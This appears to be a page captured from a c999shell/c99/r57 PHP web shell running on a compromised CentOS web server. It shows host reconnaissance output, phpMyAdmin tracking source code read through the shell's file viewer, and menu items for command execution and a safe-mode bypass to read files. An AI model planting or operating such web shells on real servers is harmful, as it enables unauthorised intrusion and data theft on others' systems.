Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/ drwxrwxrwx |
Viewing file: Select action/file-type: = $filter_ts_from && $timestamp <= $filter_ts_to && ( in_array('*', $filter_users) || in_array($entry['username'], $filter_users) ) ) { $tmp_entries[] = array( 'id' => $id, 'timestamp' => $timestamp, 'username' => $entry['username'], 'statement' => $entry['statement'] ); } $id++; } return($tmp_entries); } $entries = array(); // Filtering data definition statements if ($_REQUEST['logtype'] == 'schema' || $_REQUEST['logtype'] == 'schema_and_data') { $entries = array_merge($entries, PMA_filter_tracking($data['ddlog'], $filter_ts_from, $filter_ts_to, $filter_users)); } // Filtering data manipulation statements if ($_REQUEST['logtype'] == 'data' || $_REQUEST['logtype'] == 'schema_and_data') { $entries = array_merge($entries, PMA_filter_tracking($data['dmlog'], $filter_ts_from, $filter_ts_to, $filter_users)); } // Sort it foreach ($entries as $key => $row) { $ids[$key] = $row['id']; $timestamps[$key] = $row['timestamp']; $usernames[$key] = $row['username']; $statements[$key] = $row['statement']; } array_multisort($timestamps, SORT_ASC, $ids, SORT_ASC, $usernames, SORT_ASC, $statements, SORT_ASC, $entries); } // Export as file download if (isset($_REQUEST['report_export']) && $_REQUEST['export_type'] == 'sqldumpfile') { @ini_set('url_rewriter.tags',''); $dump = "# " . sprintf(__('Tracking report for table `%s`'), htmlspecialchars($_REQUEST['table'])) . "\n" . "# " . date('Y-m-d H:i:s') . "\n"; foreach($entries as $entry) { $dump .= $entry['statement']; } $filename = 'log_' . htmlspecialchars($_REQUEST['table']) . '.sql'; header('Content-Type: text/x-sql'); header('Expires: ' . gmdate('D, d M Y H:i:s') . ' GMT'); header('Content-Disposition: attachment; filename="' . $filename . '"'); if (PMA_USR_BROWSER_AGENT == 'IE') { header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); } else { header('Pragma: no-cache'); header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); } echo $dump; exit(); } /** * Gets tables informations */ /** * Displays top menu links */ require_once './libraries/tbl_links.inc.php'; echo ' '; /** * Actions */ // Create tracking version if (isset($_REQUEST['submit_create_version'])) { $tracking_set = ''; if ($_REQUEST['alter_table'] == true) { $tracking_set .= 'ALTER TABLE,'; } if ($_REQUEST['rename_table'] == true) { $tracking_set .= 'RENAME TABLE,'; } if ($_REQUEST['create_table'] == true) { $tracking_set .= 'CREATE TABLE,'; } if ($_REQUEST['drop_table'] == true) { $tracking_set .= 'DROP TABLE,'; } if ($_REQUEST['create_index'] == true) { $tracking_set .= 'CREATE INDEX,'; } if ($_REQUEST['drop_index'] == true) { $tracking_set .= 'DROP INDEX,'; } if ($_REQUEST['insert'] == true) { $tracking_set .= 'INSERT,'; } if ($_REQUEST['update'] == true) { $tracking_set .= 'UPDATE,'; } if ($_REQUEST['delete'] == true) { $tracking_set .= 'DELETE,'; } if ($_REQUEST['truncate'] == true) { $tracking_set .= 'TRUNCATE,'; } $tracking_set = rtrim($tracking_set, ','); if (PMA_Tracker::createVersion($GLOBALS['db'], $GLOBALS['table'], $_REQUEST['version'], $tracking_set )) { $msg = PMA_Message::success(sprintf(__('Version %s is created, tracking for %s.%s is activated.'), $_REQUEST['version'], $GLOBALS['db'], $GLOBALS['table'])); $msg->display(); } } // Deactivate tracking if (isset($_REQUEST['submit_deactivate_now'])) { if (PMA_Tracker::deactivateTracking($GLOBALS['db'], $GLOBALS['table'], $_REQUEST['version'])) { $msg = PMA_Message::success(sprintf(__('Tracking for %s.%s , version %s is deactivated.'), $GLOBALS['db'], $GLOBALS['table'], $_REQUEST['version'])); $msg->display(); } } // Activate tracking if (isset($_REQUEST['submit_activate_now'])) { if (PMA_Tracker::activateTracking($GLOBALS['db'], $GLOBALS['table'], $_REQUEST['version'])) { $msg = PMA_Message::success(sprintf(__('Tracking for %s.%s , version %s is activated.'), $GLOBALS['db'], $GLOBALS['table'], $_REQUEST['version'])); $msg->display(); } } // Export as SQL execution if (isset($_REQUEST['report_export']) && $_REQUEST['export_type'] == 'execution') { foreach($entries as $entry) { $sql_result = PMA_DBI_query( "/*NOTRACK*/\n" . $entry['statement'] ); } $msg = PMA_Message::success(__('SQL statements executed.')); $msg->display(); } // Export as SQL dump if (isset($_REQUEST['report_export']) && $_REQUEST['export_type'] == 'sqldump') { $new_query = "# " . __('You can execute the dump by creating and using a temporary database. Please ensure that you have the privileges to do so.') . "\n" . "# " . __('Comment out these two lines if you do not need them.') . "\n" . "\n" . "CREATE database IF NOT EXISTS pma_temp_db; \n" . "USE pma_temp_db; \n" . "\n"; foreach($entries as $entry) { $new_query .= $entry['statement']; } $msg = PMA_Message::success(__('SQL statements exported. Please copy the dump or execute it.')); $msg->display(); $db_temp = $db; $table_temp = $table; $db = $table = ''; require_once './libraries/sql_query_form.lib.php'; PMA_sqlQueryForm($new_query, 'sql'); $db = $db_temp; $table = $table_temp; } /* * Schema snapshot */ if (isset($_REQUEST['snapshot'])) { ?> []
[]\n"; } // end of report /* * List selectable tables */ $sql_query = " SELECT DISTINCT db_name, table_name FROM " . PMA_backquote($GLOBALS['cfg']['Server']['pmadb']) . "." . PMA_backquote($GLOBALS['cfg']['Server']['tracking']) . " WHERE " . PMA_backquote('db_name') . " = '" . PMA_sqlAddslashes($GLOBALS['db']) . "' " . " ORDER BY ". PMA_backquote('db_name') . ", " . PMA_backquote('table_name'); $sql_result = PMA_query_as_controluser($sql_query); if (PMA_DBI_num_rows($sql_result) > 0) { ?> 0) { ?>
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0049 ]-- |